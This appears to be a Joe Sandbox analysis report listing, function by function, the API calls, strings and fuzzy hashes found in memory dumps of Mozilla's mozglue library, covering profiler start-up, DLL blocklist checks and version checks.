                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1171715205-0
                                                                                                                                                                                                                                      • Opcode ID: a80a990fb0f9c1bbbd2581fc833328e1bf5dcf3e453afd79f0b489d4b9268807
                                                                                                                                                                                                                                      • Instruction ID: e2df854b587d82602cb5da40c977e422a18734a0a4a00840ca583963dfb16a71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a80a990fb0f9c1bbbd2581fc833328e1bf5dcf3e453afd79f0b489d4b9268807
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B218F72A01308ABFF108A61CD55BEB77B8AB44368F14422DE43096180D7BE9BD4C761
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?), ref: 6BAC86AE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                                                      • Opcode ID: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
                                                                                                                                                                                                                                      • Instruction ID: 0e198f5c70508f58c1cecd8a82d1fea92feb2f4204f99b09fd75b8d3d65f7eb5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06C1A472A0011A8FCF14CF68CD91BEAB7B2EF85314F1902A9D549EB345D734A9C5CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6BAC8E18
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6BAC925C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                                                      • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                                                                                      • Instruction ID: 383c35dbc3d5a9e7037d79eb70de80fb8081cc01a64c3bf82cdb2cc2e20c5c53
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDA1C572A002168FCF14CF68CD817AAB7B2AF95314F1902B9C949EB385D734A9D5CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BAA7A81
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAA7A93
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: GetTickCount64.KERNEL32 ref: 6BA75D40
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: EnterCriticalSection.KERNEL32(6BADF688), ref: 6BA75D67
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6BAA7AA1
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: __aulldiv.LIBCMT ref: 6BA75DB4
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: LeaveCriticalSection.KERNEL32(6BADF688), ref: 6BA75DED
                                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6BAA7B31
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4054851604-0
                                                                                                                                                                                                                                      • Opcode ID: 2f0de83995d2d0121906f79f061ed14ec4564cf3664fb563bce263c4d75e2c38
                                                                                                                                                                                                                                      • Instruction ID: 8c516a8d060fd2b98f827726d127464229902b32b4bfc329484eb0d1270d0614
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f0de83995d2d0121906f79f061ed14ec4564cf3664fb563bce263c4d75e2c38
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53B1BC356083808BCF25CF24C15065FF7E2AFC9314F194A5CE99667394DB78E986CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BA603D4,?), ref: 6BABB955
                                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6BABB9A5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MemoryQueryVirtualrand_s
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1889792194-0
                                                                                                                                                                                                                                      • Opcode ID: ad12734260eefa6b550a0051f6e8a11ba9d59605df5fd7f30d9cd390d880f1b6
                                                                                                                                                                                                                                      • Instruction ID: 77ca0f02179eea4c678bb4912912309a6188739b33d8333112c2433d4d2c28a9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad12734260eefa6b550a0051f6e8a11ba9d59605df5fd7f30d9cd390d880f1b6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2441EB71E002199FDF04CFA9D9C15DEB7BAEFC8354F548129D415A7344EB35A885CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF760), ref: 6BA619BD
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6BA619E5
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6BA61A27
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6BA61A41
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6BA61A4F
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6BA61A92
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6BA61AAC
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6BA61ABA
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 6BA61C69
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BA61C8F
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BA61C9D
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6BA61CAE
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF760), ref: 6BA61D52
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6BA61DA5
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6BA61DFB
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6BA61E49
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6BA61E68
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA61E9B
                                                                                                                                                                                                                                        • Part of subcall function 6BA62070: LoadLibraryW.KERNEL32(combase.dll,6BA61C5F), ref: 6BA620AE
                                                                                                                                                                                                                                        • Part of subcall function 6BA62070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6BA620CD
                                                                                                                                                                                                                                        • Part of subcall function 6BA62070: __Init_thread_footer.LIBCMT ref: 6BA620E1
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6BA61F15
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA61F46
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA61F52
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA61F59
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA61F60
                                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BA61F6D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
                                                                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                                                                      • API String ID: 290179723-2746444292
                                                                                                                                                                                                                                      • Opcode ID: ef0c8a7a6b330ea318be418a0c6a409ee5e484c7e1bac3499c6b3a8ead167dc5
                                                                                                                                                                                                                                      • Instruction ID: 383fc466a3624a466ba5f70fcdfd850939bc307ef4fdc7a663f1961c65da6c2b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef0c8a7a6b330ea318be418a0c6a409ee5e484c7e1bac3499c6b3a8ead167dc5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4F16EB1D44325AFEF209F65CD48BAABBB4FF49740F044199E905A7240E778DE81CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strchr.VCRUNTIME140(00000000,0000002E), ref: 6BA7BC5A
                                                                                                                                                                                                                                      • strchr.VCRUNTIME140(00000001,0000002E), ref: 6BA7BC6E
                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(accelerator.dll,?), ref: 6BA7BC9E
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6BA7BE33
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA7BE65
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA7BE71
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA7BE7D
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA7BE89
                                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BA7BE97
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6BA7BEE4
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA7BF15
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA7BF21
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA7BF2D
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA7BF39
                                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BA7BF47
                                                                                                                                                                                                                                        • Part of subcall function 6BABAAE0: GetCurrentThreadId.KERNEL32 ref: 6BABAAF8
                                                                                                                                                                                                                                        • Part of subcall function 6BABAAE0: EnterCriticalSection.KERNEL32(6BADF770,?,6BA7BF9F), ref: 6BABAB08
                                                                                                                                                                                                                                        • Part of subcall function 6BABAAE0: LeaveCriticalSection.KERNEL32(6BADF770,?,?,?,?,?,?,?,?,6BA7BF9F), ref: 6BABAB6B
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6BA7BFF0
                                                                                                                                                                                                                                      • _strtoui64.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000010), ref: 6BA7C014
                                                                                                                                                                                                                                        • Part of subcall function 6BABAC20: CreateFileW.KERNEL32 ref: 6BABAC52
                                                                                                                                                                                                                                        • Part of subcall function 6BABAC20: CreateFileMappingW.KERNEL32 ref: 6BABAC7D
                                                                                                                                                                                                                                        • Part of subcall function 6BABAC20: GetSystemInfo.KERNEL32 ref: 6BABAC98
                                                                                                                                                                                                                                        • Part of subcall function 6BABAC20: MapViewOfFile.KERNEL32 ref: 6BABACB0
                                                                                                                                                                                                                                        • Part of subcall function 6BABAC20: GetSystemInfo.KERNEL32 ref: 6BABACCD
                                                                                                                                                                                                                                        • Part of subcall function 6BABAC20: MapViewOfFile.KERNEL32 ref: 6BABAD05
                                                                                                                                                                                                                                        • Part of subcall function 6BABAC20: UnmapViewOfFile.KERNEL32 ref: 6BABAD1C
                                                                                                                                                                                                                                        • Part of subcall function 6BABAC20: CloseHandle.KERNEL32 ref: 6BABAD28
                                                                                                                                                                                                                                        • Part of subcall function 6BABAC20: UnmapViewOfFile.KERNEL32 ref: 6BABAD37
                                                                                                                                                                                                                                        • Part of subcall function 6BABAC20: CloseHandle.KERNEL32 ref: 6BABAD43
                                                                                                                                                                                                                                        • Part of subcall function 6BABAE70: GetCurrentThreadId.KERNEL32 ref: 6BABAE85
                                                                                                                                                                                                                                        • Part of subcall function 6BABAE70: EnterCriticalSection.KERNEL32(6BADF770,?,6BA7C034), ref: 6BABAE96
                                                                                                                                                                                                                                        • Part of subcall function 6BABAE70: LeaveCriticalSection.KERNEL32(6BADF770,?,?,?,?,6BA7C034), ref: 6BABAEBD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/, xrefs: 6BA7BDDD
                                                                                                                                                                                                                                      • accelerator.dll, xrefs: 6BA7BC8E, 6BA7BC9D
                                                                                                                                                                                                                                      • LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?), xrefs: 6BA7BFCF
                                                                                                                                                                                                                                      • LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag, xrefs: 6BA7BF5B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ConditionMask$File$CriticalInfoSectionView$CloseCreateCurrentEnterHandleLeaveSystemThreadUnmapVerifyVersionmemsetstrchr$Mapping_strtoui64freestrcmp
                                                                                                                                                                                                                                      • String ID: LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?)$LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/$LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag$accelerator.dll
                                                                                                                                                                                                                                      • API String ID: 3889411031-3373514183
                                                                                                                                                                                                                                      • Opcode ID: b7e00b90c0202194e0bc403ae93ff2fc54beccf95fe35e462d92e32974a9bd5e
                                                                                                                                                                                                                                      • Instruction ID: a0a13aae6935ba05ee4c2f472cd105f02e9a328c14f7dbc6f7c25c303a0c4d89
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7e00b90c0202194e0bc403ae93ff2fc54beccf95fe35e462d92e32974a9bd5e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11E109B5A0C300ABDF209F28C955B5EB7E5EF85704F448A3DE88587281DB78E9C5C792
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA97090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6BA9B9F1,?), ref: 6BA97107
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BA9DCF5), ref: 6BA9E92D
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9EA4F
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9EA5C
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9EA80
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9EA8A
                                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BA9DCF5), ref: 6BA9EA92
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9EB11
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9EB1E
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6BA9EB3C
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9EB5B
                                                                                                                                                                                                                                        • Part of subcall function 6BA95710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6BA9EB71), ref: 6BA957AB
                                                                                                                                                                                                                                        • Part of subcall function 6BA8CBE8: GetCurrentProcess.KERNEL32(?,6BA531A7), ref: 6BA8CBF1
                                                                                                                                                                                                                                        • Part of subcall function 6BA8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BA531A7), ref: 6BA8CBFA
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9EBA4
                                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BA9EBAC
                                                                                                                                                                                                                                        • Part of subcall function 6BA994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BA994EE
                                                                                                                                                                                                                                        • Part of subcall function 6BA994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BA99508
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9EBC1
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8,?,?,00000000), ref: 6BA9EBCE
                                                                                                                                                                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BA9EBE5
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8,00000000), ref: 6BA9EC37
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BA9EC46
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6BA9EC55
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6BA9EC5C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • [I %d/%d] profiler_start, xrefs: 6BA9EBB4
                                                                                                                                                                                                                                      • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BA9EA9B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                                                                                                                                                                                      • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                                                                                                                                                                      • API String ID: 1341148965-1186885292
                                                                                                                                                                                                                                      • Opcode ID: fe83bc41f96ef55df4d4cd2e2bb12bda6eacb6d2a8aa95a5b35386db709544f1
                                                                                                                                                                                                                                      • Instruction ID: 0e920886406acc48257771c5621b8c3f2870d11546f2278875b51d24e24cc5fe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe83bc41f96ef55df4d4cd2e2bb12bda6eacb6d2a8aa95a5b35386db709544f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95A134706143049FCF10AF28E984B6A77E5FFC6714F18812DE91987652DB39D886CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6BA64196
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6BA641F1
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA64223
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA6422A
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA64231
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA64238
                                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BA64245
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6BA64263
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6BA6427A
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 6BA64299
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6BA642C4
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA642F6
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA64302
